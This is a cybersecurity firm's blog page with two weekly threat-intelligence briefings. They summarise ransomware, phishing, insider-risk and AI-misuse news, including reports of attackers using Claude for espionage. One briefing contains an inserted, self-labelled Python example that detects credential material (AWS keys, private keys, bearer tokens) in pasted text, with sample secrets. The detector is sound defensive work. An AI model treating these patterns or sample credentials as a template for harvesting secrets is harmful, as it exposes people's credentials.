Threat Intelligence Blog

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 28 November 2025

- M&A Risk: Ransomware Hackers Attack SMBs Being Acquired to Try and Gain Access to Multiple Companies

- CrowdStrike Catches Insider Feeding Information to Hackers

- A Third of Workers Risk Cyber Security Breach by Using Work Devices for Personal Use

- Shadow AI Security Breaches Will Hit 40% of All Companies by 2030, Warns Gartner

- New (ISC)2 Report Finds That Vendor Security Gaps Threaten Critical Infrastructure and Supply Chains

- A Fake Windows Update Screen Is Fooling Windows Users into Installing Malware

- FBI: Cybercriminals Stole $262 Million by Impersonating Bank Support Teams Since January

- Compromised Credentials Responsible for 50% of Ransomware Attacks

- Russian and North Korean Hackers Form Alliances

- Alliances Between Ransomware Groups Tied to Recent Surge in Cybercrime

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber-related news from the last week.

Executive Summary

This week we start with an alert on the cyber security risks of mergers and acquisitions: attackers have been found to have entered the networks of companies that are later acquired by another organisation, allowing the attackers to move into the acquiring organisation as well.

We highlight insider risks that business leaders should be aware of, including employees who are bribed by attackers, employees using work devices for personal use, and employees using shadow AI. Attacker tactics in this week’s review include attacks via third parties, fake Windows update screens, impersonation of bank support teams, and the use of compromised credentials to launch ransomware attacks. We also see greater collaboration and alliances between attacker groups.

A key part of building stronger cyber security and resilience is understanding how attackers are evolving their tactics. This threat intelligence empowers you to objectively assess how your organisation is susceptible to these tactics and what you need to do to enhance your own security. We strongly recommend that threat intelligence should feature in your leadership training, your incident response exercise and your governance papers; contact us to discuss how we can help you achieve this in a proportionate way.


Top Cyber Stories of the Last Week

M&A Risk: Ransomware Hackers Attack SMBs Being Acquired to Try and Gain Access to Multiple Companies

Research describes how ransomware actors focus on smaller firms that are likely acquisition targets. By compromising SonicWall devices and leaving backdoors in place, the attackers can pivot into larger enterprises once deals complete, often without the parent organisation realising these assets exist. The pattern underlines the importance of thorough asset discovery, credential hygiene and security reviews before and immediately after acquisitions.

Source: https://www.techradar.com/pro/security/ransomware-hackers-attack-smbs-being-acquired-to-try-and-gain-access-to-multiple-companies

CrowdStrike Catches Insider Feeding Information to Hackers

CrowdStrike confirmed that a now terminated insider secretly shared screenshots of internal systems with a cyber criminal collective called Scattered Lapsus$ Hunters. The hackers say they agreed to pay $25,000 and claim they briefly obtained SSO authentication cookies, but CrowdStrike reports no breach of its systems or customer data. The incident is now with law enforcement and highlights the impact of insider risks faced by organisations.

Source: https://www.bleepingcomputer.com/news/security/crowdstrike-catches-insider-feeding-information-to-hackers/

A Third of Workers Risk Cyber Security Breach by Using Work Devices for Personal Use

A survey of 1,000 Irish office workers finds 31% use work devices for personal tasks, with 32% clicking suspicious links and 22% accessing sensitive documents over public Wi-Fi. High risk behaviour includes 26% entering company data into AI tools, 33% using unauthorised tools and 19% sharing work passwords. Despite this, 73% feel confident spotting cyber threats and 54% feel confident in their password security, even though 23% of organisations suffered a cyber security breach in the past year and 32% of workers do not receive regular training.

Source: https://businessplus.ie/news/cyber-security-work-devices-personal-use/

Shadow AI Security Breaches Will Hit 40% of All Companies by 2030, Warns Gartner

Gartner warns that 40% of organisations could suffer security breaches through shadow AI by 2030. Staff routinely paste documents or data into unapproved AI tools, risking exposure of customer records, salary information, source code and strategic plans. Surveys cited include one where 90% of security leaders admit using unapproved AI tools and 71% of UK employees do the same. Gartner advises clear AI policies, audits for unsanctioned usage and provision of approved tools with training.

Source: https://www.fortra.com/blog/shadow-ai-security-breaches-will-hit-40-companies-2030-warns-gartner

New (ISC)2 Report Finds That Vendor Security Gaps Threaten Critical Infrastructure and Supply Chains

An (ISC)2 study finds many organisations are worried about supplier risk yet are slow to manage it. Respondents report frequent security deficiencies in vendors, including weak identity controls, lack of compliance certifications and inadequate monitoring. Nearly a third experienced incidents linked to suppliers, yet many only review vendor security annually. The report urges continuous assessment, clearer contractual expectations and closer collaboration across procurement, legal and security teams.

Source: https://www.helpnetsecurity.com/2025/11/25/isc2-vendor-security-gaps-report/

A Fake Windows Update Screen Is Fooling Windows Users into Installing Malware

Researchers uncovered a new ClickFix campaign in which full-screen fake Windows Update or captcha pages trick users into pasting attacker-supplied commands that have been copied to their clipboard. The commands fetch PNG images that hide malware within pixel data, which a .NET Stego Loader decrypts and runs in memory. The malware also contains around 10,000 decoy functions to hinder analysis by researchers.

Source: https://www.howtogeek.com/a-fake-windows-update-screen-is-fooling-windows-users-into-installing-malware/

FBI: Cybercriminals Stole $262 Million by Impersonating Bank Support Teams Since January

The FBI warns that scammers posed as bank support staff in more than 5,100 complaints since January 2025, stealing around $262 million. Criminals convince victims to grant remote access, reveal credentials or approve transactions, then drain accounts or move funds into cryptocurrency. Tactics include spoofed phone numbers, fake support sites and search engine poisoning, prompting the FBI to urge customers to verify contact details and banks to harden customer authentication.

Source: https://www.bleepingcomputer.com/news/security/fbi-cybercriminals-stole-262-million-by-impersonating-bank-support-teams-since-january/

Compromised Credentials Responsible for 50% of Ransomware Attacks

Beazley Security’s Q3 2025 Threat Report shows ransomware surged in August and September, accounting for 26% and 18% of incidents. Akira, Qilin and INC Ransomware made up 65% of cases. The most common entry point was valid compromised credentials used to access VPNs, ahead of exploitation of internet facing systems. SonicWall vulnerabilities were heavily abused, with stolen configuration files expected to fuel future targeted attacks.

Source: https://natlawreview.com/article/compromised-credentials-responsible-50-ransomware-attacks

Russian and North Korean Hackers Form Alliances

Researchers say Russian group Gamaredon and North Korea’s Lazarus Group are collaborating by sharing infrastructure and tools, including command and control servers and the InvisibleFerret malware family. The partnership combines Russian espionage targeting with North Korean financially motivated operations, including past thefts of billions in crypto assets. Analysts warn this alignment could make both campaigns harder to attribute and disrupt.

Source: https://cybersecuritynews.com/russian-and-north-korean-hackers-form-alliances/

Alliances Between Ransomware Groups Tied to Recent Surge in Cybercrime

Data shows a 41% rise in ransomware attacks between September and October, with the ransomware group Qilin responsible for 29% of October incidents, followed by Sinobi and Akira. Ransomware groups such as LockBit 5.0, DragonForce and Qilin are forming alliances that share tools, infrastructure and reputations. North America suffered 62% of attacks, and more than 200 ransomware variants have been seen this year.

Source: https://www.csoonline.com/article/4096263/alliances-between-ransomware-groups-tied-to-recent-surge-in-cybercrime.html



Threats

Ransomware, Extortion and Destructive Attacks

Akira ransomware crew infected enterprise systems during M&A • The Register

Ransomware hackers attack SMBs being acquired to try and gain access to multiple companies | TechRadar

Russia-linked crooks bought themselves a bank for Christmas • The Register

Get ready for 2026, the year of AI-aided ransomware • The Register

Compromised Credentials Responsible for 50% of Ransomware Attacks - Beazley

Alliances between ransomware groups tied to recent surge in cybercrime | CSO Online

Scattered Spider alleged members deny TfL charges

Ransomware Attacks Remaking Cyber as National Priority

Ransomware gangs seize a new hostage: your AWS S3 buckets | CSO Online

Scattered Lapsus$ Hunters stress testing Zendesk weak spots • The Register

Piecing Together the Puzzle: A Qilin Ransomware Investigation

Qilin Ransomware Turns South Korean MSP Breach Into 28-Victim 'Korean Leaks' Data Heist

Kaspersky / Press release | Kaspersky and VDC Research reveal over $18B in potential losses from ransomware attacks on the global manufacturing industry in 2025

Hackers come for big British retailers | The Observer

UK car production plummets 24% in wake of JLR cyber attack | Autocar

Should we ban ransom payments to cyber attackers?

Ransomware Victims

Akira ransomware crew infected enterprise systems during M&A • The Register

Scattered Spider alleged members deny TfL charges

UK car production plummets 24% in wake of JLR cyber attack | Autocar

Crisis24 shuts down emergency notification system in wake of ransomware attack | CyberScoop

Canon Says Subsidiary Impacted by Oracle EBS Hack - SecurityWeek

Asahi Data Breach Impacts 2 Million Individuals - SecurityWeek

Scottish council still reeling from 2023 ransomware attack • The Register

Report warns councils after 2023 Western Isles cyber-attack | The Herald

Security expert warns London councils cyber attack 'could be far more serious than being let on' - My London

NCSC called in as London councils grapple with cyber attacks | IT Pro

London Cyberattacks Confirmed — Security Experts Issue Multiple Warnings

Lessons From the European Airports Ransomware Attack | Lawfare

Phishing & Email Based Attacks

Email blind spots are back to bite security teams - Help Net Security

ClickFix Attack Uses Steganography to Hide Malicious Code in Fake Windows Security Update Screen

Advanced Security Isn't Stopping Old Phishing Tactics

Hackers Replace 'm' with 'rn' in Microsoft(.)com to Steal Users' Login Credentials

Microsoft cracks down on malicious meeting invites - Help Net Security

Phishing Breaks More Defenses Than Ever. Here’s the Fix 

Other Social Engineering

ClickFix Attack Uses Steganography to Hide Malicious Code in Fake Windows Security Update Screen

A fake Windows Update screen is fooling Windows users into installing malware

FBI: Cybercriminals stole $262M by impersonating bank support teams

Microsoft cracks down on malicious meeting invites - Help Net Security

JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers

RomCom Uses SocGholish Fake Update Attacks to Deliver Mythic Agent Malware

Hackers keep pretending to be TechCrunch reporters and tricking companies into revealing sensitive information across email and call schemes | TechRadar

Fraud, Scams and Financial Crime

FBI: Cybercriminals stole $262M by impersonating bank support teams

Criminal networks industrialize payment fraud operations - Help Net Security

Scammers hacked her phone and stole thousands of pounds - how did they get her details? - BBC News

AI Arms Race: How to Stay Ahead of Generative AI-Powered Fraud | MSSP Alert

New legislation targets scammers that use AI to deceive | CyberScoop

The Destruction of a Notorious Myanmar Scam Compound Appears to Have Been ‘Performative’ | WIRED

Did Myanmar’s Junta Demolish Scam Centers Just for Show? - The New York Times

Artificial Intelligence

Shadow AI Security Breaches will hit 40% of all Companies by 2030, Warns Gartner | Fortra

Get ready for 2026, the year of AI-aided ransomware • The Register

Underground AI models promise to be hackers ‘cyber pentesting waifu’  | CyberScoop

Vibe coding feels magical, but it can sink your business fast - here's how | ZDNET

'Dark LLMs' Aid Petty Criminals, Underwhelm Technically

How Malware Authors Incorporate LLMs to Evade Detection

Anthropic's new warning: If you train AI to cheat, it'll hack and sabotage too | ZDNET

Emerging threat from deepfakes leads to cybersecurity arms race | SC Media

Think your password is safe? AI could break it before you blink - BetaNews

AI Arms Race: How to Stay Ahead of Generative AI-Powered Fraud | MSSP Alert

New legislation targets scammers that use AI to deceive | CyberScoop

New research finds that Claude breaks bad if you teach it to cheat | CyberScoop

Four charged with plotting to sneak Nvidia chips into China • The Register

Google's AI is now snooping on your emails - here's how to opt out | ZDNET

CISOs Get Real About Hiring in the Age of AI

Prompt Injections Loom Large Over ChatGPT Atlas Browser

2FA/MFA

Germany urges default 2FA for webmail providers | Cybernews

Malware

A fake Windows Update screen is fooling Windows users into installing malware

New ShadowV2 botnet malware used AWS outage as a test opportunity

Botnet takes advantage of AWS outage to smack 28 countries • The Register

Hackers now hide powerful malware in fake Windows updates that look real enough to fool even cautious users easily today | TechRadar

How Malware Authors Incorporate LLMs to Evade Detection

JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers

Cybercriminals Exploit Browser Push Notifications to Deliver Malware - Infosecurity Magazine

BadAudio malware: How APT24 scaled its cyberespionage through supply chain attacks

ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access

Operation Endgame disrupts Rhadamanthys information-stealing malware

DPRK’s FlexibleFerret Tightens macOS Grip

RomCom Uses SocGholish Fake Update Attacks to Deliver Mythic Agent Malware

WSUS RCE Exploit Used to Deploy ShadowPad Backdoor

Bots/Botnets

New ShadowV2 botnet malware used AWS outage as a test opportunity

Botnet takes advantage of AWS outage to smack 28 countries • The Register

How your dashcam can be hacked, and how to protect yourself from the attack | Kaspersky official blog

Mobile

New CISA alert: encryption isn't what's failing on Signal and WhatsApp | TechSpot

CISA Warns of Active Spyware Campaigns Hijacking High-Value Signal and WhatsApp Users

Spyware Allows Cyber Threat Actors to Target Users of Messaging Applications | CISA

Scammers hacked her phone and stole thousands of pounds - how did they get her details? - BBC News

Internet of Things – IoT

New ShadowV2 botnet malware used AWS outage as a test opportunity

Botnet takes advantage of AWS outage to smack 28 countries • The Register

How your dashcam can be hacked, and how to protect yourself from the attack | Kaspersky official blog

Aircraft cabin IoT leaves vendor and passenger data exposed - Help Net Security

Data Breaches/Leaks

The breaches everyone gets hit by (and how to stop them) - Help Net Security

JPMorgan, Citi, Morgan Stanley Client Data May Be Exposed by Vendor's Hack, NYT Reports

Gainsight Expands Impacted Customer List Following Salesforce Security Alert

OpenAI data may have been exposed after a cyberattack on analytics firm Mixpanel

Iberia discloses customer data leak after vendor security breach

EU proposes sweeping reforms to the GDPR, cookie rules, Data Act, and breach reporting | McDermott Will & Schulte - JDSupra

Council had ‘gaps in cybersecurity’ before ransomware attack

Cox Enterprises discloses Oracle E-Business Suite data breach

183 Million Credentials Misreported as a Gmail Breach - Security Boulevard

Russian and North Korean hackers steal 2TB of data from South Korean banks - Cryptopolitan

Canon Says Subsidiary Impacted by Oracle EBS Hack - SecurityWeek

Asahi Data Breach Impacts 2 Million Individuals - SecurityWeek

Kensington and Chelsea Council cyber attack sees emergency plans initiated - BBC News

Security expert warns London councils cyber attack 'could be far more serious than being let on' - My London

NCSC called in as London councils grapple with cyber attacks | IT Pro

US car parts dealer allegedly hit by massive breach | Cybernews

Organised Crime & Criminal Actors

Criminal networks industrialize payment fraud operations - Help Net Security

Ministers send small businesses cyber threat warning - UKTN

Government publishes independent study revealing cost of cyber attacks to UK economy

'Dark LLMs' Aid Petty Criminals, Underwhelm Technically

Alice Guo: Philippines jails 'Chinese spy mayor' for life - BBC News

The Destruction of a Notorious Myanmar Scam Compound Appears to Have Been ‘Performative’ | WIRED

Did Myanmar’s Junta Demolish Scam Centers Just for Show? - The New York Times

Insider Risk and Insider Threats

A third of workers risk cybersecurity breach by using work devices for personal use

Cybersecurity giant CrowdStrike fires insider working with hackers - Cryptopolitan

Human risk: don’t blame the victim, fix the system | TechRadar

Why legal firms must confront insider cyber threats - Tech Monitor

Empathy key weapon in cyber fight

Supply Chain and Third Parties

JPMorgan, Citi, Morgan Stanley Client Data May Be Exposed by Vendor's Hack, NYT Reports

Gainsight Expands Impacted Customer List Following Salesforce Security Alert

Iberia discloses customer data leak after vendor security breach

BadAudio malware: How APT24 scaled its cyberespionage through supply chain attacks

Supply chain sprawl is rewriting security priorities - Help Net Security

Cox Enterprises discloses Oracle E-Business Suite data breach

Google security experts say Gainsight hacks may have left hundreds of companies affected | TechRadar

Canon Says Subsidiary Impacted by Oracle EBS Hack - SecurityWeek

Software Supply Chain

UK Report Proposes Liability For Software Provider Insecurity - Infosecurity Magazine

Cloud/SaaS

New ShadowV2 botnet malware used AWS outage as a test opportunity

Botnet takes advantage of AWS outage to smack 28 countries • The Register

ToddyCat's New Hacking Tools Steal Outlook Emails and Microsoft 365 Access Tokens

MS Teams Guest Access Can Remove Defender Protection When Users Join External Tenants

Fluent Bit vulnerabilities put billions of containers at risk with exploits that could cripple cloud systems across industries | TechRadar

Ransomware gangs seize a new hostage: your AWS S3 buckets | CSO Online

How has cloud flipped the regular security narrative? – Computerworld

China-Linked APT31 Launches Stealthy Cyberattacks on Russian IT Using Cloud Services

Outages

Internet failure highlighted connected risk – Russell

China simulated a Starlink blockade over Taiwan that uses around 2,000 drones with jammers to create an 'electromagnetic shield' — CCP scientists devise potential plan to cut off satellite internet to the island | Tom's Hardware

Encryption

New CISA alert: encryption isn't what's failing on Signal and WhatsApp | TechSpot

Cheap Device Bypasses AMD, Intel Memory Encryption

Quantum encryption is pushing satellite hardware to its limits - Help Net Security

Passwords, Credential Stuffing & Brute Force Attacks

Compromised Credentials Responsible for 50% of Ransomware Attacks - Beazley

DPRK’s FlexibleFerret Tightens macOS Grip

Hackers Replace 'm' with 'rn' in Microsoft(.)com to Steal Users' Login Credentials

Social data puts user passwords at risk in unexpected ways - Help Net Security

Think your password is safe? AI could break it before you blink - BetaNews

183 Million Credentials Misreported as a Gmail Breach - Security Boulevard

Social Media

Social data puts user passwords at risk in unexpected ways - Help Net Security

Influencers in the crosshairs: How cybercriminals are targeting content creators

Regulations, Fines and Legislation

Should we ban ransom payments to cyber attackers?

Mounting Cyber-Threats Prompt Calls For Economic Security Bill - Infosecurity Magazine

Key provisions of the UK Cyber Resilience Bill Revealed - Infosecurity Magazine

SolarWinds dismissed: what the SEC’s U-turn signals for cyber enforcement | A&O Shearman - JDSupra

The Internet Is on Fire and the FCC Just Walked Away With the Extinguisher

Rights groups accuse ICO of ‘collapse in enforcement activity’

UK data regulator under pressure after failing to regulate public sector effectively - Neowin

U.K. Cyber Security and Resilience bill set to regulate critical infrastructure suppliers | Article | Compliance Week

NIS2 Directive Explained: Part 2 – Management Bodies Rules | DLA Piper - JDSupra

New legislation targets scammers that use AI to deceive | CyberScoop

Four charged with plotting to sneak Nvidia chips into China • The Register

UK Report Proposes Liability For Software Provider Insecurity - Infosecurity Magazine

Switching to Offense: US Makes Cyber Strategy Changes

Powers to protect us from cyber attacks ‘go too far’

Mobile industry warns patchwork regs are driving up costs • The Register

New York Hospital Cyber Rules to 'Raise the Bar' Nationwide

Models, Frameworks and Standards

Key provisions of the UK Cyber Resilience Bill Revealed - Infosecurity Magazine

EU proposes sweeping reforms to the GDPR, cookie rules, Data Act, and breach reporting | McDermott Will & Schulte - JDSupra

NIS2 Directive Explained: Part 2 – Management Bodies Rules | DLA Piper - JDSupra

U.K. Cyber Security and Resilience bill set to regulate critical infrastructure suppliers | Article | Compliance Week

Data Protection

Civil liberties groups call for inquiry into UK data protection watchdog | Data protection | The Guardian

Rights groups accuse ICO of ‘collapse in enforcement activity’

UK data regulator under pressure after failing to regulate public sector effectively - Neowin

Careers, Working in Cyber and Information Security

Invisible battles: How cybersecurity work erodes mental health | CSO Online

CISOs Get Real About Hiring in the Age of AI

The CISO’s greatest risk? Department leaders quitting | CSO Online

Law Enforcement Action and Take Downs

Operation Endgame disrupts Rhadamanthys information-stealing malware

'Scattered Spider' teens plead not guilty to UK transport hack

Russian Suspected of Cyberattacks on Polish and EU Companies Detained in Krakow - Militarnyi

Alice Guo: Philippines jails 'Chinese spy mayor' for life - BBC News

The Destruction of a Notorious Myanmar Scam Compound Appears to Have Been ‘Performative’ | WIRED

Did Myanmar’s Junta Demolish Scam Centers Just for Show? - The New York Times


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

BadAudio malware: How APT24 scaled its cyberespionage through supply chain attacks

Polish minister warns of ongoing 'cyberwar' with Russia - TRT World

China simulated a Starlink blockade over Taiwan that uses around 2,000 drones with jammers to create an 'electromagnetic shield' — CCP scientists devise potential plan to cut off satellite internet to the island | Tom's Hardware

China-Linked APT31 Launches Stealthy Cyberattacks on Russian IT Using Cloud Services

With Friends Like These: China Spies on Russian IT Orgs

As Space Becomes Warfare Domain, Cyber Is on the Frontlines

Security is not only military—it is societal. Something worth learning from the Scandinavians

Nation State Actors

Political instability is now the defining force behind global business risk | theHRD

Switching to Offense: US Makes Cyber Strategy Changes

China

China simulated a Starlink blockade over Taiwan that uses around 2,000 drones with jammers to create an 'electromagnetic shield' — CCP scientists devise potential plan to cut off satellite internet to the island | Tom's Hardware

China-Linked APT31 Launches Stealthy Cyberattacks on Russian IT Using Cloud Services

With Friends Like These: China Spies on Russian IT Orgs

Four charged with plotting to sneak Nvidia chips into China • The Register

TP-Link sues Netgear, claiming misleading statements on national security risks and alleged ties to state-backed cyberattacks | TechRadar

Alice Guo: Philippines jails 'Chinese spy mayor' for life - BBC News

Russia

Russian Hackers Target US Engineering Firm Because of Work Done for Ukrainian Sister City - SecurityWeek

Polish minister warns of ongoing 'cyberwar' with Russia - TRT World

Russia-linked crooks bought themselves a bank for Christmas • The Register

Russian and North Korean Hackers Form Alliances to Attack Organizations Worldwide

China-Linked APT31 Launches Stealthy Cyberattacks on Russian IT Using Cloud Services

With Friends Like These: China Spies on Russian IT Orgs

Russian Suspected of Cyberattacks on Polish and EU Companies Detained in Krakow - Militarnyi

Russian and North Korean hackers steal 2TB of data from South Korean banks - Cryptopolitan

Iran

Iranian APT hacks helped direct missile strikes in Israel and the Red Sea | CSO Online

North Korea

Russian and North Korean Hackers Form Alliances to Attack Organizations Worldwide

DPRK’s FlexibleFerret Tightens macOS Grip

Russian and North Korean hackers steal 2TB of data from South Korean banks - Cryptopolitan

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Political instability is now the defining force behind global business risk | theHRD

Security is not only military—it is societal. Something worth learning from the Scandinavians





Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to external articles are provided for general interest and awareness only. Linking to or reposting external content does not constitute endorsement of or by any organisation, service, or product. We do not control and are not responsible for the content, security, or availability of external websites or links. Full credit is given to the original authors and sources. E&OE.

 

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 21 November 2025

- The Trojan Prompt: How GenAI Is Turning Staff Into Unwitting Insider Threats

- Copy And Paste Cyber Security Warning — 99% Of Enterprises Now At Risk

- Google: Threat Groups Will Accelerate Their Use of AI in 2026

- “We’ve Seen a 30% Increase in Successful Email Scams in the Last Two Years”

- “We Are Moments Before the First Real Cyberwar, One in Which Not a Single Shot Is Fired”

- Our Industries Are Vulnerable to Cyber Attacks: Boardrooms Must Prioritize Resilience, Not Reaction

- Overconfidence Is the New Cyber Risk: Immersive’s 2025 Cyber Workforce Benchmark Report Exposes a Global Readiness Illusion

- The Hidden Cost of a Hack: Unpacking the Ripple Effect of Cybercrime

- Half of Ransomware Access Due to Hijacked VPN Credentials

- Half a Million Stolen FTSE 100 Credentials Found on Criminal Sites

- UK Targets Russian Cyber Gang as £14.7 Billion Attacks Hit British Economy

- Cyber-enabled Kinetic Targeting: Iran-linked Actor Uses Cyber Operations to Support Physical Attacks

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber-related news from the last week.

Executive Summary

This week, we have reviewed several articles in the specialist and general media about the risks presented by AI, in particular generative AI. These include employees pasting sensitive information into public tools, and attackers exploiting the functionality of GenAI such as using Claude to almost completely carry out a cyber espionage operation against organisations. Our review also highlights that the more traditional attack vectors remain a risk for organisations, including hijacked VPNs, weak password controls, and phishing.

Our message to business leaders is clear and unchanged, and supported by various sources included in our review this week: Boards must ensure they have a realistic assessment of their readiness to deal with a cyber attack. It is particularly important that business leaders should be part of the readiness and should not consider the response to be IT focused. This requires an upskilled leadership team to command and govern their cyber security; contact us for details of how we support organisations to achieve this in a proportionate way.


Top Cyber Stories of the Last Week

The Trojan Prompt: How GenAI Is Turning Staff into Unwitting Insider Threats

Two evolving risks are emerging relating to generative AI. The first, a “Trojan prompt”, is where staff paste sensitive documents, credentials or API keys into public GenAI tools, which often fall outside traditional data loss prevention and monitoring controls. The second is the “Imprompter” attack, where hidden instructions in prompts harvest personal data with close to an 80% success rate. A robust response combines clear GenAI governance, user education and hardware level zero trust on endpoints that inspects data when it is accessed on the device’s own drive.

Source: https://securityboulevard.com/2025/11/the-trojan-prompt-how-genai-is-turning-staff-into-unwitting-insider-threats/

Copy And Paste Cyber Security Warning — 99% Of Enterprises Now at Risk

LayerX’s Browser Security Report finds that sensitive data now often leaves enterprises through copy and paste rather than file uploads. Findings show that 77% of employees paste data into AI tools and 46% into file storage, frequently outside IT control. Browser extensions amplify the risk: 99% of enterprise users have at least one installed, more than half of those extensions hold high or critical permissions, and 26% are sideloaded (installed outside normal channels), creating major blind spots for security teams.

Source: https://www.forbes.com/sites/daveywinder/2025/11/18/copy-and-paste-cybersecurity-warning---99-of-enterprises-now-at-risk/
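The common thread in the two stories above is data leaving through the clipboard rather than through file uploads, where file-centric DLP does not look. As an added example (not code from either article, nor from LayerX), the following Python screens text about to be pasted for credential-like material; the AWS access key ID and PEM header formats are published, while the key-name list, the redaction style and the 3.5-bit entropy threshold are assumptions for illustration.

```python
"""Pre-paste secret screening: flag credential-like material before it leaves
the endpoint. Added illustration only; not code from the articles or LayerX."""
from __future__ import annotations

import math
import re
from dataclasses import dataclass

# Fixed-format rules use published formats (AWS access key IDs start with
# AKIA + 16 uppercase alphanumerics; PEM private keys carry a BEGIN header).
# The "assignment" rule is a heuristic for key = value pairs in code or config.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "bearer_token": re.compile(r"\b[Bb]earer\s+([A-Za-z0-9\-._~+/]{20,}=*)"),
    "assignment": re.compile(
        r"(?i)\b(api[_-]?key|secret|token|password|passwd)\b\s*[:=]\s*"
        r"['\"]?([^\s'\"]{8,})"),
}

# Assumption: values this random are more likely secrets than prose.
ENTROPY_THRESHOLD = 3.5


@dataclass(frozen=True)
class Finding:
    kind: str       # which rule fired
    preview: str    # redacted, safe to write to a log
    entropy: float  # Shannon entropy (bits per character) of the matched value


def shannon_entropy(value: str) -> float:
    """Bits per character: 0 for a repeated char, log2(len) when all differ."""
    if not value:
        return 0.0
    counts: dict[str, int] = {}
    for ch in value:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def redact(value: str) -> str:
    """Keep enough to triage (first 4, last 2 chars) without logging the secret."""
    if len(value) <= 8:
        return "*" * len(value)
    return f"{value[:4]}...{value[-2:]}"


def scan_paste(text: str) -> list[Finding]:
    """Return every credential-like match in the text about to be pasted."""
    findings: list[Finding] = []
    for kind, pattern in PATTERNS.items():
        for m in pattern.finditer(text):
            # Capturing rules hold the value in their last group; the
            # fixed-format rules match the value itself.
            value = m.group(m.lastindex) if m.lastindex else m.group(0)
            entropy = shannon_entropy(value)
            # "password: changeme" in a help request is prose, not a leak, so only
            # the heuristic rule is gated on randomness; fixed formats always count.
            if kind == "assignment" and entropy < ENTROPY_THRESHOLD:
                continue
            findings.append(Finding(kind, redact(value), round(entropy, 2)))
    return findings


def paste_allowed(text: str) -> bool:
    """Policy decision a browser extension or endpoint agent would enforce."""
    return not scan_paste(text)


# Constructed sample pastes (not real data). The AWS key is the placeholder
# value that AWS uses in its own documentation.
SAMPLE_PASTES = {
    "prose": "Summarise the attached quarterly sales report in three bullets.",
    "help_request": "Why does my login fail? The config says password: changeme",
    "code_with_key": (
        "fix this boto3 call:\n"
        "client = boto3.client('s3', aws_access_key_id='AKIAIOSFODNN7EXAMPLE')"
    ),
    "pem_dump": "-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEA...\n",
    "curl_paste": "curl -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.c2FtcGxl.sig'",
}

if __name__ == "__main__":
    for name, text in SAMPLE_PASTES.items():
        verdict = "ALLOW" if paste_allowed(text) else "BLOCK"
        print(f"{name:14s} {verdict:5s} {scan_paste(text)}")
```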

Google: Threat Groups Will Accelerate Their Use of AI in 2026

Anthropic’s research shows China-linked attackers using the generative AI model Claude to carry out around 80% to 90% of a cyber espionage operation against about 30 organisations, with humans stepping in only at key decision points. Meanwhile, Google’s Cybersecurity Forecast 2026 expects threat groups to adopt AI across reconnaissance, exploitation and malware development, while AI enabled tools can also reshape how cyber security teams defend the organisation.

Source: https://www.msspalert.com/news/google-threat-groups-will-accelerate-their-use-of-ai-in-2026

“We’ve Seen a 30% Increase in Successful Email Scams in the Last Two Years”

Data from At Bay, which insures about 40,000 businesses, shows a 30% increase in successful email scams over two years as attackers use AI to craft convincing, personalised messages. Traditional email security struggles with this variety and speed. Organisations are urged to move towards context aware detection, scrutinise how AI agents are integrated into systems and recognise the new attack surfaces created by rapid AI adoption.

Source: https://www.calcalistech.com/ctechnews/article/lsncr0rtd

“We Are Moments Before the First Real Cyberwar, One in Which Not a Single Shot Is Fired”

The Director General of Israel’s National Cyber Directorate describes three stages of AI and cyber convergence: using AI for cyber defence, protecting AI systems themselves and a future AI versus AI phase where autonomous agents conduct both attacks and defence. Israel is cited as one of the most targeted countries globally. AI driven campaigns are expected to be capable of digitally besieging states, even as constant pressure will force defences to improve.

Source: https://www.calcalistech.com/ctechnews/article/askx8c3bj

Our Industries Are Vulnerable to Cyber Attacks: Boardrooms Must Prioritize Resilience, Not Reaction

A new report by Accenture highlights the challenge faced by organisations defending against AI driven threats. It finds that 88% of UK firms lack the maturity needed as AI accelerates ransomware, deepfakes and data theft. Cyber security is presented as a people and reputation issue as much as a technical one. Boards should embed security into strategy, build cross functional crisis preparations and design business continuity for critical services.

Source: https://www.infosecurity-magazine.com/opinions/boardrooms-must-prioritize/

Overconfidence Is the New Cyber Risk: Immersive’s 2025 Cyber Workforce Benchmark Report Exposes a Global Readiness Illusion

Immersive’s 2025 Cyber Workforce Benchmark Report finds that 94% of organisations feel ready for a major incident, yet in the simulated attacks only 22% of the decisions made were appropriate and average containment times are around 29 hours. Only 41% of organisations involve non technical teams in simulations, leaving a significant readiness gap.

